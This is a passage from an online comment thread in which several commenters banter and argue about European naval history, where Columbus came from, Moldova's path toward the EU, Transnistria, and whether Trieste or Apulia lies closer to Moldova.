the Black Sea? Poland, with its puny, outdated navy? Germany? Do you think the Americans are about to take on another burden in the Black Sea? Did you know that by international convention, any warship over 15,000 tonnes may only cross the Bosphorus with Turkish approval? France and Italy's new super-modern FREMM frigates, at 6,000 tonnes, pack more firepower than many much larger ships - including those of the Russian navy. If France and/or Italy deploy two of these frigates to the Black Sea, it changes the naval balance of power there. Except that France has signed an agreement to build four helicopter carriers of around 20,000 tonnes for the Russian Navy. Which has greatly upset the Romanians. I somehow doubt the French navy will be sending ships into the Black Sea anytime soon, to challenge Russia potentially. Or that the Romanians have any desire to purchase French ships. Once again, God forbid we should actually cooperate on defence matters in Europe. My original point was only meant to suggest that it would be much more intelligent and useful to keep those excellent ships within allied European hands. There is also the question of our ex-flagship the Giuseppe Garibaldi, which is the world's smallest aircraft carrier. It will be de-commissioned within 5 years or so, having been launched in 1984. It has been a particularly useful and inexpensive ship to operate, packing 18 vertical take-off Harrier fighters and other helicopters. During the recent Libyan War, some 300 sorties were flown from its deck. Should such a useful ship also go to South America or Asia, or stay in Europe? Caro signore, You're welcome. I take your point. This is always a problem and depends on the context. If someone says that Sigmund Freud,was born at Pribor in Czechoslovakia (until 1993) or the Czech Republic now, this is somewhat misleading, since in 1856 this was Freiberg in Mähren (Moravia), which was a part of the Austrian Empire. There were people who said that he was born in the Austro-Hungarian Empire, which is equally untrue because that empire was created in 1867, &c. The balance of power between the Crown of Castile and the Crown of Aragon was really difficult for the Aragonese, since there was a 5 : 1 population ratio. As for "castellano", Castilian, as a synonym of Spanish, this is totally wrong, of course, and forgets the other nations, peoples, cultures and languages of Spain. Even the Spanish Constitution refers to castellano (Castilian), not "español" (Spanish) language, and many people still do, especially in Catalonia. There are no "British" or "Belgian" languages, just English, Welsh, French, Dutch, German, etc. This could apply to Italy and other countries as well. Bear in mind that King Ferdinand II of Aragon was the model or one of the models for your compatriot Nicolò Machiavelli's 'The Prince', and Queen Isabella I outfoxed him several times... "Soziglia"? in Genoese? But for the sake of the other posters who don't know that language (or dialect?) perhaps you should point out that in Italian (Tuscan dialect if you prefer) it's Siviglia, like in Rossini's ' Il barbiere di Siviglia'. Thank you for the interesting information concerning Genoa and Venice. The Portuguese Navy, the world's oldest, "—No, I don't think so. Slavery in Brazil was not abolished in the 1860s, but in 1888, the main reason why the Empire of Brazil fell a year later and a republic was proclaimed. No history "sounds like ancient, irrelevant history" to me, don't worry about that. And the Dorias... Jesuits have a general as well. A general commanding a company... strange. As for Cardinal Bagnasco, if he is elected pope after Ratzinger and Saint Malachy's famous Prophecy of the Popes were right, he would be the 268th of the list, and .) Both Bagnasco and Mario Monti were born in 1943, a key year in the history of Italy in the 20th century, as you know well. I meant thou... Genoa, Ontario, Michigan, Maryland, Virginia/DC, Trieste... Hey, your life reminds me of my own life! Hello Joe Milovan! :) I am not sure why do you think that I underestimate the role of R.o.Genova in history, your -historically- great neighbours, mio caro amico Veneziano. I am not sure why do you think I am unaware that Italy is capable of crafting advanced and precise weapons. We have many Italians hunting for European bison (żubr) in our primeval forests of Puszcza Białowieska, with their Baretta rifles, I hope that's the name. Good stuff, I've been told. I have no idea why you mention here the indeed out-dated and puny Polish navy. Did anyone propose that we 'sell our junk to NATO', so it can be placed on the drying Azov Sea, where it would be indeeed more ajusted in size to an extent of the water-basin?<. Well, I can say Poland and Italy are in exact the same position! Poland would like tos trengthen Romania's fleet on the Black Sea, at least I hope she would, but unfortunately she does not have the money. But don't underestimate Poland's role in history, Joe! Ciao and it's always a pleasure :) Joe.... I did the crazy thing and checked those Polish ships you mention... Please, please be precise and truthful when you cite data. The ships server in US navy from 1980 to 2000 and 2002. And they were given FOR FREE to Poland from US. You see the difference? You propose that old Italian ships are 'kept in Europe' if somebody is to pay you for that. Do you now understand why hald of Europe thinks you are not especially talented in warfare, geoplotics and such stuff? But you ARE extremely talented in artistic crafts, including money-earning... Let it stay like that. And take cum g. sal. my wide-brush, rhetorical stereotyping, please! :) One more example Joe! Have you heard about Leopard tanks serving in Polish army side by side our Twardy and T-seventy-something? Exactly the same issue as with your outdated junk ships :) Did those 'rigid' GermanZ 'sell it to NATO' to strenghthen the Eastern flank? No, they gave it for free. See the difference, now? Hey! I was not untruthful - I wrote that the ships were launched in 1978 - go check the dates. Actually, I was unaware this materiel had been gifted. It's possible however that NATO paid the US or Germany something for this gift. Still, interesting... No, I am a big fan of Polish history - as you know ;-) and I don't underestimate the role of Poland. And, BTW, yes we are especially talented in warfare, geopolitics and the like. Take into consideration just how defeated we were in 1945 - and just how much we have re-built our international prestige... OK, hard to do that in the aftermath of Berlusconi, I admit ;-) Still, we have achieved a President of the ECB - many executives at the IMF and the World Bank, an Under-Secretary General of the UN (Giandomenico Picco) a Secretary General of NATO, leadership of the Central European Initiative, a strong leadership position at UNESCO (World Heritage Programme), the FAO in Rome, etc. etc. - not bad for a country that was utterly humiliated, defeated and occupied a few short decades ago. As for geopolitics - we have no enemies today - what better defence of a country's diplomacy and geopolitics can there be? No, we cannot afford to gift the ships now. Especially since they are worth something. On the other hand, 200 million would keep the new FREMM deployments moving forward - but let's not forget the Italian federal budget is over €510 billion this year. You accuse me of seeking to make a profit? And besides, we are speaking of 20 warships up for sale - not two. Quite possibly, the US and Germany felt they owed Poland something. Gifting ships and tanks is not a normal practise, you know? As for living in ex-Venetian lands ;-) We Genoese and Venetians have always lived side by side. We are "two peas in a pod" - and besides, it was always a good idea to keep a close eye on what the other rival was doing. Rest assured that there were a few Venetians on those ships Columbus set out on - it was the nature of the game. Just as there were Genoese somewhere in Marco Polo's caravan across Asia. Did you know that here in the Venezia-Giulia (Trieste and Gorizia) they refer to World War I - between Italy and Austria-Hungary - as the "Last War Between Genoa and Venice"? Hapsburg naval power derived from its control of the ex-Venetian territories - while "Italian" naval power was basically Genoa's. The Italians around Istria and Dalmatia typically favoured Venetian dialect to proper Italian (Tuscan) and never admitted they were giving up their loyalty to Venice - just that they did not recognise themselves in the Savoyard State of Turin. Anyway... So what do we do about Moldova? And Russian military power in Transnistr. I realise the Germans, Finns, etc. would hardly be enthusiastic about EU expansion - but I have long been convinced Moldova should join Romania as a semi-autonomous province (like Friuli-Venezia Giulia here) and Macedonia should join Bulgaria as a semi-autonomous province. This would put both peoples inside the EU immediately - and without waiting for approval from 28 other countries. Does anyone think independent Moldova or Macedonia is ever going to enter the EU on their own? And let's face it, EU membership would mean a lot of cash heading into both Chisinau and Skopje... Thanks for the correction on Brazilian slavery - I was thinking of Russia's abolition of serfdom. If you have any taste for Papal intrigue, try reading up on the "Siri Thesis". It sounds like only more idle chatter regarding the Vatican - until you discover that all of the Genoese prelates Ratzinger has nominated were disciples of Siri's - and typically ordained by Siri. It seems Ratzi was a big conservative ally - and together with a few other key conservatives from Austria and France, had sponsored the elevation of Wojtyla to the throne to put down the Jesuit rebellion and throw out the liberals sponsored by Paul VI and John XXIII. On the Portuguese Navy - well, that's what they say. "The Portuguese Navy, tracing back to the 12th century, is the oldest continuously serving navy in the world." "In 1317 King Denis of Portugal decided to give, for the first time, a permanent organization to the Royal Navy, contracting Manuel Pessanha of Genoa to be the first Admiral of the Kingdom." (from Wikipedia). I can only find a handful of "Pessagno" families in the phone books of Liguria. I think it more likely that the surname was "Bisagno" but got twisted while travelling abroad in other languages. Where do you live, btw. And how are you so knowledge about Spanish history? So, I pose the question to you: what should be done about Moldova? The people do not deserve their current plight and should be helped. You're welcome. Mind, considering your output the number of your lapses or incorrections is really minimal! Thank you, I wrote down that title, I might read it when Petrus Romanus is pope. The Armada Portuguesa, the Portuguese Navy, for which I feel a lot of sympathy, by the way. Well, if you had added " oldest continuously serving navy in the world."... but you just wrote " the world's oldest". Anyway, I recently had to mention this on two threads concerning the Liaoning, the first Chinese aircraft carrier: "The Chinese Imperial Navy came into existence from 1132 during the Song Dynasty to the end of the Qing period in 1912. Prior to 12th century, Chinese naval ships were not organized into a uniform force. After 1911, it was replaced by the Republic of China Navy and then the People's Liberation Army Navy after 1949. By the way, I know about naval history and naval matters and I read your reply to Forlana Dec 16th, 18:42 with interest, trying to detect some error ;-) but you are knowledgeable and tough, Joe! Ah, I recently posted this, you might like to take a look. It's about Georgia Laconophile Dec 4th, 21:08 What a beautiful flag. It's a shame St. George hasn't been as kind to Georgia as he has been to England. Recommend 7 Permalink reply Accrux in reply to Laconophile Dec 4th, 23:28 old flag of Sardinia,... Recommended 2 Permalink reply... --------------- I answer your questions: I have spent most of my life in—in no particular order—France, Spain and the United Kingdom, my three main countries. A few years in Belgium and Italy as well (I have Belgian—Walloon—relatives, but alas, not Italian ones). Plus Marshovia and Carpathia, of course. Quite a European, as you can see. I know about history (not only Spanish) because I studied History (European and modern) at university and have read, researched a little and written a few modest things as well, mostly unpublished. Especially Spanish, British, French, Italian, German, Austrian and Russian history, 1453-1945. American (USA) and Roman and ancient Greek history too, of course, and other countries and periods as well, but just reading, as a hobby. Curiosity satisfied? "So, I pose the question to you: what should be done about Moldova? The people do not deserve their current plight and should be helped." To HELP Moldova, a proud European country, as much as possible, with money, technology and whatever they may need. To be really generous, but without being overbearing or patronizing. I checked the links and the third one doesn't work, my fault. (I know it changed in the late 1990s) By the way, "Incorrections" is not the right word, I meant to say errors, mistakes. Joe Milovan, by saying 'don't underestimate Poland's history' I simply ment that past great history of any country, including Genova, Venezia, Italy, Poland or Sokoto Caliphate does not really per se help solving problems of today. What do we do about Moldova? Well I am a bit intimidated to say, since Trieste has already made public it is so near the place :-) :-* "There is also the question of our ex-flagship the Giuseppe Garibaldi, which is the world's smallest aircraft carrier." -------------------- I had missed this, and to keep my job as Nitpicker-General of the Thread, I must say that the Royal Thai Navy's HTMS Chakri Naruebet is even smaller. She ("it" for you) has problems with her aircraft, but she's still there. "Chakri Naruebet is the smallest aircraft carrier in operation in the world. She displaces 11,486 tons at full load." (Wikipedia). Take a look at her and the old USS Kitty Hawk CV 63. "All aircraft carriers are equal but some aircraft carriers are more equal than others" ;-) Don't think that I spent time looking it up at Jane's or Google, I knew one of the Spanish engineers who built it in the 1990s at Empresa Nacional Bazán (now Navantia) at Ferrol (once "El Ferrol del Caudillo", because Franco was born there...), in Spain, and he mentioned this several times. <." ------------------------- These Genoese... One of them, Cristoforo Colombo, seduced or outfoxed Queen Isabella I the Catholic of Castile (not an easy task!) and discovered America in 1492, but he thought it was Asia... ;-) "No, I am a big fan of Polish history - as you know ;-) and I don't underestimate the role of Poland." ------------------------ Have you visited any of these Polish war cemeteries in Italy? San Lazzaro, near Bologna (1432 soldiers) Casamassina (430 soldiers) Loreto (1081 soldiers) Monte Cassino (1072 soldiers) Thousands of Poles 'became' Italians as well by right of death in less than two years... :-) Well, it was easy task for him... being half-Polish ;)...... Colombowicz! Fascinating, I had missed this. Thank you. I wonder what some Genoese people I know will say about this... By the way, in case you read one my posts here I would like to say that I "forgot" to add four countries to the already long list: Sweden, Poland, Portugal and Hungary. What about the other half? Interesting info - I hadn't seen the Thai carrier. Perhaps some sources I had seen didn't classify her as an "aircraft" carrier - but only as a helicopter carrier? The Harrier VTOL jet sort of confuses the distinction. Amazing - wiki says the ship was built in the 90's for only USD 336 million. A true bargain. One would think the Spanish would be able to export more of them. I think we are in a bit of a fix here over the Garibaldi. The 30,000-tonne Cavour was supposed to be its replacement, but it is currently too costly to deploy - and during the Libyan intervention was kept at home in favour of the cheaper-to-operate Garibaldi. The truth is that we probably need another pocket-sized carrier to replace it. "Have you visited any of these Polish war cemeteries in Italy?" I have one part of my maternal family from right near Monte Cassino - first visited the site in July 1986 - only two months after having visited Auschwitz. I was suitably moved, thinking of how many were dying in Polish death camps while they were fighting also to liberate our country. I also visited the Loreto cemetery in 1992. I drove past the San Lazzaro cemetery in '99, without really stopping. Didn't know about Casamassina though - and I have never visited Apulia. I speak a fair bit of Polish, having studied in the country in the '80's. Forlana and I go back and forth like an old married couple, don't we? Her Italian is quite good, btw. I would tone down my bragging with her, but this new-found Polish (and typically Varsovian) arrogance, buying into all the rubbish northern-European propaganda about Italy-as-a-PIG-country is being experienced as a sort of betrayal here in the peninsula. Our companies are beginning to pull out of Poland, claiming that "Poland is being sewn up by the German industrial lobby - and is now hostile to Italy." I have heard this from three different industrialists in the last 6 months. I would not believe this line - but Forlana's posts on other blogs seem to justify that opinion. You are writing with a Genoese person. Whose family comes from the same valley in Liguria as Columbus's family. Pure Polish poppycock. As is the idea that Columbus was Spanish or Portuguese. All these countries vastly underestimate the completely cosmopolitan nature of Genoese colonialism. We are fairly sure in Genoa that Columbus was NOT born at home in Liguria. One of the most accredited theses is that he was actually born in the Genoese colony of Chios. " I simply ment that past great history of any country, including Genova, Venezia, Italy, Poland or Sokoto Caliphate does not really per se help solving problems of today." In the Balkans? History does not condition EVERYTHING in the Balkans? If there is no Italian connection, there is no Moldova/Romania as we know them - there is only Dacia. I suppose it would be far easier for "Dacia" to choose union with the CIS, no? Funny, but as good linguists as they are, I can always distinguish Polish and Ukrainian accents in Italian. Romanians who come to our country not only reliably learn Italian in one month - they also tend to lose any distinguisble trace of a non-local accent within a few years - much more so than the South Americans, for example. Genoese were granted the right to bear the cross of St. George after the First Crusade, as reward also for making a key contribution to the conquest of Jerusalem. Actually, the Genoese used the symbol quite cynically in the ensuing centuries - mostly to remind the Christians we were the conquerors of Jerusalem, whenever it became useful as we were signing treaties with the Muslims. The truth is that our sailors were appalled and ashamed at what our "religious brethren" did after we had conquered the city for them. Thus it was that Genoa made an agreement with the crown of England in the 1100's to exchange the right to establish a trading colony in Southampton (together with Bruges, our bases for commerce/intermediation with the Hanseatic League) for the right of English ships to fly our flag in the Mediterranean - thus implying Genoese naval protection on the way to the Holy Land. The bombing of Genoa by the British ships is the date most remembered of WWII in the city. A particular stab in the back not warranted by our city's loyalty to the Brits. For example, I saw some time ago a roster of the ships of the Spanish Armada: one-third of the ships actually came from Spanish possessions or allies in Italy: Naples, Sardinia, Venice, the Papacy, Savoy... but there were no Genoese ships - as the city fathers had told the Spanish Emperor there was no money to contribute to the venture (this, as Genoese bankers were skimming the best part of the profits from South American traffic). The Thai aircraft carrier was and is an aircraft carrier, like the British Invincible class or the Spanish Príncipe de Asturias, now at the end of her life. People referring to them as helicopter carriers didn't know what they were talking about, even when they didn't have jets. The Harriers are jets, not helicopters, as you know well. That's what Bazán (later IZAR, now Navantia), the Spanish equivalent of Fincantieri, thought... and wished. The last one they built was a hybrid of aircraft carrier and LHD, exported to Australia, You will like this one: I like very much the Garibaldi and the Cavour, they are much more elegant than the British- and Spanish-built aircraft carriers. Some of the most beautiful battleships ever built were the Littorio class. The fate of the Rome was really sad. What a month of September of 1943! "The bombing of Genoa by the British ships is the date most remembered of WWII in the city. A particular stab in the back not warranted by our city's loyalty to the Brits." --------------- What are you talking about? The ones who stabbed France, and also the United Kingdom, in the back (even FDR said it) on June 10, 1940 were the Italians who declared war on them without any real need, just for GREED, when they thought these two countries had lost the war. Genoa was a part of Italy, which was at war with GB. Bad luck, they should have kept their independent republic. " but this new-found Polish (and typically Varsovian) arrogance," "new-found"? Ah, you should have seen them in the 16th and 17th centuries, with their formidable armies, hussars and the like! Or at Tannemberg in 1410, &c. The Polish winged hussars looked like gods!...... -------------------------- "You are writing with a Genoese person." -------------------------- "Writing with"? Ah, if you hadn't said it now I wouldn't know it... ;-) But tell Forlana and The Daily Telegraph, my friend, don't tell me, the thesis is that Portuguese fellow's, not mine. Don't start with your antitheses-without-theses... Personally, I couldn't care less where Columbus was born or if he was Jewish or Gentile. What I know is that he took information and experience from other people, that he miscalculated the whole thing (the real size of the Earth, for example, which happened to be much larger) and that he thought he had reached Asia sailing westwards... when in fact there was a whole new continent in between! Thanks to which native Americans were and are called... Indians! (injuns) and there are the French and Indian War, the West Indies and the East Indies, etc. Well, at least we have Jean-Philippe Rameau's beautiful 'Les Indes galantes'... " ... they are much more elegant than the British- and Spanish-built aircraft carriers." ----------------- I mean the three carriers of the British Invincible class, the British built beautiful aircraft carriers for many decades. Not much time - unfortunately, spent all I had reading Accrux. Wwow, where have you been hiding all that time? :-) Just a couple of extemely serious issues: 1. Sweden, Poland, Portugal and Hungary - if I read your fine posts correctly I at last got it where are Marshovia and Carpathia 2. Daily Mail claims the other half is Portuguese. We can't be sure except that it is established he for sure he wasn't Genovese. At least for the needs of this discussion 3. Went to Wiki to read 'Origin theories of Christopher Columbus'. Almost every folk under the sun have a theory that he was one of them. Except Catalan and Polish, such origins were guessed by non-Catalan and non-Polish. So from now on it is established once and forever - Cristòfor Colom/Krzysztof Kolumb was half Catalan and half Polish. 4. Soory to disapoint Joe byt Poles are still fond of Italians. So no excuses for Marchione's political decisions to run away from Poland with that FIAT of his. Just give us back all the money we have spent for super-duper preferential conditions FIAT had here and you can go assemble the junk near Napoli. 5. Joe, let's take a closer look at the map posted by A. Open? Head right SE to where Hospodarstwo Mołdawskie in light pink resided. Light pink stands for 'lenno' = fiefdom. Those arogant Varsovians must have been there... Does this fact helps solving the problem of today? I doubt. Times of Dacia are more relevant ;) One more point with the map. See Akerman? Adam Mickiewicz The Akkerman Steppe (Stepy Akermańskie) I entered the dry waters of an open sea; My carriage like a canoe plunges in the green Deep of flowery meadows and passes between The coral isles of brier and laburnum tree. The dusk falls. Neither barrow nor road can I see. I look up, the stars seeking that could lead my way. A cloud glints in the distance – sign of rising day. Perhaps Akkerman's lantern can show light to me. Let's halt! It is so quiet I can hear the skein Of cranes that flying slowly a hawk's reach surpass, I hear the beetle kissing the drip of the rain, The sleek viper that softly moves among the grass... In this stillness – my ear I so curiously strain A voice from home could reach me – No one calls, alas! --- Best to both of you! I spend much of mine reading Milovan Djilas (almost always a pleasure) and replying to him! I wasn't hiding, it's just that you didn't pay attention... ;-) Where were you? 1. No, Sweden, Poland, Portugal and Hungary are countries whose history I studied with particular interest, along with the others I had already mentioned. Marshovia and Carpathia are small but beautiful countries between the Transylvanian Alps and the Carpathians. Like Brigadoon, not everyone is able to see them. God bless them. 2. Of course, sorry, I just read the first paragraphs of the Daily Telegraph and left the rest of the article to be read later on, but I went to bed and there was no later on... I will do it tonight. 3.Some Catalans claimed that Columbus was Catalan, it's an old story. Colom is not an uncommon family name in Catalonia, I personally met some people with that name. And where did he go wnen he went back to Europe in 1493? To Barcelona! That proves it! A Catalano-Polish origin is fine as far as I am concerned. 4. No idea. 5. Well, though you address Joe, I ("A.") followed your instructions and took a closer look at the map. Look at this (you may use this website for free, consider it a Christmas present from me: Wesolych Swiat Bozego Narodzenia! 1400. 1500. 1600. 1700. Thanks for Mickiewicz's poem. (I know Akkerman because of the Convention. mainly). --- "Best to both of you!" Thank you, but please render unto Caesar the things which are Caesar's, and unto God the things that are God's. Milovan is God, but I am Caesar, DIFFERENT entities... ;-) 0. Agreed. 1/2. I will pay attention from now on but - 1. - please do keep it simple for me. It was a long way. Due to reasons independent of your/my will Brigadoon was an empty sound. But took me to correct times. Viva Lehar by Metro-Goldwyn-Mayer aka Pollywood-... 2&3. NP. And thanks for fine link with great sentence "The Catalan roots has the same major weakness as the Italian roots: Columbus never wrote in Catalan and never claimed to be Catalan." 5. Again- thanks for links. Will look closer later. For now, never show this general view to J. or you will lose a friend 6. Oops. My fault Julius :) 0 & 1/2. OK 3/4. (New). Winter in the Northern Hemisphere starts tomorrow, the 21st, at 12:12 CET (Western, Northern, Southern and Central Europe etc, except the UK, Ireland, Portugal, etc). 12/12/12/12. I wish you a happy Sol Invictus Day. 8/9. (New). If the Mayans or those who interpret the Mayans were right and tomorrow is the end of the world , I wish you (and Milovan and the others) a happy transition from this world to the other world or wherever. 1. Don't believe literally those Lehar/Metro-Goldwyn-Mayer stories, they took advantage of small European countries with no © and referred to them without any respect, inventing things, without even paying them anything. As for Carpathia, a ship was actually named after her, RMS Carpathia, and she actually rescued the survivors of the Titanic. As for Brigadoon, sorry, This is Brigadoon, my dear Forlana, One day every century... From the film (in reality it's even more beautiful). Ah, the folks with the two Americans! 2 & 3. You're welcome. What is "NP."? Nema Problema? ..... 5. I might have lost that friend already (I hope not), but not because of that map. See above, an uppercase five-letter word in one of my posts. But History is History. 6. Tiberius JULIUS Caesar Augustus, of course. Don't get me wrong, if you address Joe in a post sent to me he won't be notified and if he comes across it and reads it he might think "why didn't she send it to me?" and be jealous. Same thing for me if you address me in a post sent to him. This might lead, at "best", to a Jules et Jim situation, in which you would be Catherine, Joe would be Jim and I would be Jules (Julius for you), and at worst to... Heaven knows what! NB. If this helped to preserve peace I would accept to be Jim and let Joe be Jules. But honestly, I think it would be better if for the time being we are just Forlana, Milovan and Accrux, because the three of us have a real life and... Accrux, thanks for the wishes - both for winter solstice and Christmas. I wholeheartedly return both. More light is badly needed as is some celebrating with family. Merry Christmas to you and everyone who might read it. ------ NP.: correct, nie ma, nie ma :) Brigadoon. I will know now! Though when I was in Glasgow, so almost, almost in Edinburgh where the rovin' lad used to know Jo, they sounded different? Joe Milovan will be not be jealous he is very calm Northerner. He prefers little provocations (i.e. Polish camps lately :) to check my patellar reflex, will I kickat once or a little later. Best to you Best to you :) Ah, that's 'my' Forlana, the kindhearted one, ma belle polonaise, the one I like! Thanks lot! But written nema, I think (I am referring to Serbo-Croatian). Thanks again (for the lofs, I mean the laughs). Never be too sure, he's Italian, ain't he? And you are 'northerner' than he is, and so am I in my three fourths. Ah... I think I will check my patellar reflex now... :-( Thanks, likewise Thanks. likewise ;-) Don't tell me, please! The EU thinks that Moldova is a good bet for future membership because it is ''European'': meaning - 'Christian'; perhaps meaning: 'Aryan/Romance-language-speaking, or possibly ''cultured like us, not like them'' - whoever us and them may be. Surely it should be because it is already a member of the Council of Europe - a fact that extreme nationalists of the French and other types (Gaullists, fascists, and other assorted right-wingers) find hard to understand, what with Guyane and many other American, Asian and African places being also ''European'' as in parts of the so-called ''European'' Union. God forbid however, should they be labellable as ''muslim''; or maybe ''moonie''? Well, they really are like you. Romance language, christian, white European, that's a serious record. There is no economic relevance, what is the fact of economic transition, for what exactly is Moldova struggled for? The skepticism is based not on the road to EU, but in the fails or uncertain reports made by Moldovan governmental staff,there is no such thing like clear and rational economic strategy, there is no clear financial division between corporation who doesn't exist actually, and there is no such structure of management of markets. I still don't see the work, just aspirations. That Moldova is NOT a success story is obvious and no amount of handshaking will change that. First the EU leaders should persuade Putin to withdraw its armed units from Transdnistria and to support free referendum on this tiny region's future status. The EU has a responsibility to bring an end to this post-Cold war anomaly, a topic carefully avoided by the TE author. Transdnistria isn't really that important even in Moldova - it's just one seventh of the population, on less than 10% of the territorial area. The priority has to be building good institutions and achieving economic development. The territorial issue doesn't have to be resolved - a pragmatic short term work around would be preferable. "..a pragmatic short term work around would be preferable." Preferable to whom ? Would that 'pragmatism' include evacuation of Russian army units ? Not much economic progress can be expected in isolation. Lets not forget that talks involving Moldova, TransDnister, Russia, Ukraine and the OSCE resumed in 2008, and so far got nowhere. Disputes continue over language, dominated by Russian-speakers, even though around half the population use Moldovan, virtually identical to Romanian, as a first language. Even though the region has its own currency, constitution, parliament, flag, etc., it remain a typical bastion of Soviet rhetoric, with plenty of Lenin's monuments and armed Russian troops. Russia's annual financial assistance is at the root of the region's corruption, organised crime and smuggling. So much for institution building. I hear you Didomyk. Italy is the closest Romance-language country to both Romania and Moldova (let's leave aside for a moment the old Roman/Dacian dispute regarding Romanian history). And Trieste, where I live, is the closest part of Italy to Moldova: we have many Moldovans in our region (and Albanians and Bulgarians and Romanians, etc.), although there are more women than men coming to live here and marry. (Italian citizens seeking a divorce, without children, must wait at least three years, while if they have children, the proceedings may continue for 5-10 years; FOREIGN citizens however retain the right to divorce according to their own home country's laws - so marriages between Italians (especially men) and non-Italians (especially women) are becoming increasingly common. In general, having got over the hump of the first wave of Romanian immigration to our country (now the largest number of foreigners resident in our peninsula, at one million) I would say another smaller wave of Moldovan immigration does not represent a source of worries for anyone here. (The issue of whether or not there are jobs for ANYONE here is something else... although at the moment, Friuli's unemployment is one of the lowest in southern Europe, at 6%). And then, there is the long-running question of the Corridor-Five train and motorway connection between Barcellona and Kiev:... which could include, or could have easily included, another connection after Budapest or Miskolc into Romania and perhaps even to Moldova. This project is now dead in the water, due to the economic crisis - but if and when the crisis passes, it may become a new priority. At bottom, Romania was until a short while ago a booming economy - and will soon return to a boom. In any case, these topics may soon assume new importance in Rome. New elections, now to be held in February, will inevitably lead to the political downfall of Berlusconi - his credibility is absolutely finished here. And that will mean the end of his personalising relations with Russia and Putin through his henchman Paolo Scaroni at ENI. The Left returning to power is not at all as pro-Russian or pro-Putin as Silvio. As dedicated Europeans, there will be greater attention paid to Central Europe from Bersani, Romano Prodi's former Minister of the Economy. Perhaps, just perhaps, that will mean greater interest and engagement in Ukraine. And Moldova. Thanks for posting that link to the "Corridor 5" route, even though it may be for now 'dead in the water'. Any chance of it being implemented in stages where construction costs would be lower ? Hello! Well - the problem is not just the recession - but mostly the opposition of the environmentalists and Greens. This article (try putting it into google translations or some other on-line translator) describes the pros and cons:... As I understand it, the project's father in the early 90's was the Italian economist Tito Boeri: Boeri is close to Pier Luigi Bersani's Democratic Party - generally a supporter of the project. But it has met with the staunch opposition of the residents of the Val Susa on the Italian-French border, as well as the very active support of comedian-cum-politician Beppe Grillo. Against this lobby, French President Hollande is very keen to move forward with this infrastructural project, which has enjoyed the support of Silvio Berlusconi and some moderate centre-left leaders like Bersani and Romani Prodi. It remains to be seen if this project will eventually build its tunnels across the Italo-French Alps - and then proceed across the Italo-Slovenian Alps. If the Alps can be conquered (twice) then I think the rest of the route will follow sooner or later... " And Trieste, where I live, is the closest part of Italy to Moldova:" ----------------------------- Unless Piero Dagradi, Fratelli Fabri Editori and my old 'Nuovissimo Atlante Universale' lie... I would say that Brindisi, Bari and virtually the whole of Puglia are significantly closer... So, you are Italian... Hmmm, I am looking at the map. OK, Apulia is slightly closer by air - which means nothing, especially given that flights only exist to Chisinau from Venice, Milan, Bologna and Rome (no Apulia). In Romania, WizzAir (Hungarian) offers flights Bari-Bucharest, while Carpatair offers a flight Bari-Timisoara. So, Apulia has a chance to be represented. Trieste-Timisoara are a mere 850km by car (9.5 hours) - and the roads have been improving significantly (close to 85% is now motorway). Trieste-Chisinau are 1600km by car - only 40% are motorway (basically the same as to Timisoara). Michelin says 22 hours by car to get there. And from Apulia? Do you really want to challenge Friuli-Venezia Giulia against Apulia in Central Europe? I think Trieste, which shared citizenship with Transylvania under the Hapsburg Emperor for two centuries (1711-1918) has some cards to play in the region. And, Friuli is basically allied to the Veneto in Central Europe. We work together with the industrialists and bankers of Padua, Treviso and Verona. Not to mention the fact that Trieste was for centuries the principal port of Vienna. And then, Croatia is due to enter the EU within 7 months. This should also facilitate greater contact/business with northern Serbia/eastern Romania and northeastern Italy. Here is the website of the Central European Initiative - headquartered in Trieste: No, I am not Italian, don't jump to conclusions because of a simple atlas... I bought it along with many other books when I lived in Italy, a long time ago. Alas, I lost or gave away many of them, but I keep my old atlas and though I have better and more modern atlases in four languages, I always had a preference for this one... Look Milovan, be honest and intellectually rigorous: you wrote "And Trieste, where I live, is the closest part of Italy to Moldova:", which is wrong, and I simply corrected you, that's all. I knew this before I looked it up because I have a "geographical memory", so to say, I visualize maps without actually seeing them. "Hmmm...slightly [well, c. 20 km] closer by air [of course!], which means nothing,"etc. Don't try to make of this a Trieste-Brindisi football match, asking me "Do you really want to challenge Friuli-Venezia Giulia [where you live] against Apulia in Central Europe?" [as if I were an Apulian], and the like, I am not Italian, I don't live in Italy and I really couldn't care less about all this, no more than I cared when I corrected a few wrong things you said on another thread a few minutes ago about slavery in Brazil, etc. Honestly, I am under the impression that being Italian you didn't like to have been corrected in this and tried to compensate it with data, arguments and digressions, but try to look at it this way: you were WRONG, but now you will never be wrong again in this particular point thanks to my correction. You should have thanked me instead of lecturing me, that's what I usually do when I am rightfully corrected, because thanks to the correction I learn something new. Milovan, you are an intelligent and cultured person, I enjoy reading some of your posts and I learn a lot about Italian politics and economy, etc, but I would like that you could understand this strange process: Milovan: "And Trieste, where I live, is the closest part of Italy to Moldova:" Accrux: "Unless Piero Dagradi, Fratelli Fabri Editori and my old 'Nuovissimo Atlante Universale' lie... I would say that Brindisi, Bari and virtually the whole of Puglia are significantly closer.." Milovan: "Do you really want to challenge Friuli-Venezia Giulia against Apulia in Central Europe?" (plus a report on the advantages of Friuli-Venezia Giulia over Puglia/Apulia). Your reply is half a non sequitur half an exaggeration, because I NEVER challenged or even proposed anything, I just stated a bare objective fact. It's like if a Belgian had said that Belgium has a larger area than Moldova and someone (not even a Moldovan!) had corrected him and then the Belgian had replied that well, OK, yes, Moldova is slightly larger, but that means nothing, etc and had written a long story telling the many economic, political, demographical and geographical advantages of Belgium over Moldova, adding "Do you really want to challenge Belgium against Moldova in Europe?" It's absurd, really. You got the wrong end of the stick. In Trieste we consider Central Europe our lands, and we do not consider Apulia as having much to do with Central Europe. Culturally, they have more contact with Russia than with the Czech Republic, Romania, Austria or Moldova. So, yes, I stand corrected on a strictly geographical point "as the crow flies". But I repeat, if you know the territory, culture, business and security arrangements, Apulia is a very long way from Moldova... so if my challenge seemed a non-sequitur, it is because I was wondering how or why you would point out "irrelevant" Apulia. Thank you for explaining your detailed knowledge of maps. Always a useful skill - in peacetime and war ;-) And yes, business, political and social ties look very much like a football match in this part of the world - and football matches are deathly important ;-) Nor did I wish to sound presumptuous, but I am shocked a non-Italian would possess (and cite) Fabbri Editori and the "Nuovissimo Atlante Universale". Was this a hobby or a professional commitment? Eppur si muove... Well, I'll repeat it again: my correction was purely geographical, and was a minor one, almost a blink. Like this ;-) I didn't challenge or propose anything concerning Brindisi and Trieste and their respective communications with Moldova or anywhere else. Some of your considerations just added information, which is always welcome, it's your "Do you really want to challenge Friuli-Venezia Giulia against Apulia in Central Europe?" that left me flabbergasted, because —I repeat for the fourth time— I did NOT challenge or propose anything. In Hegelian terms, how on earth can there be an antithesis (yours) which is the negation 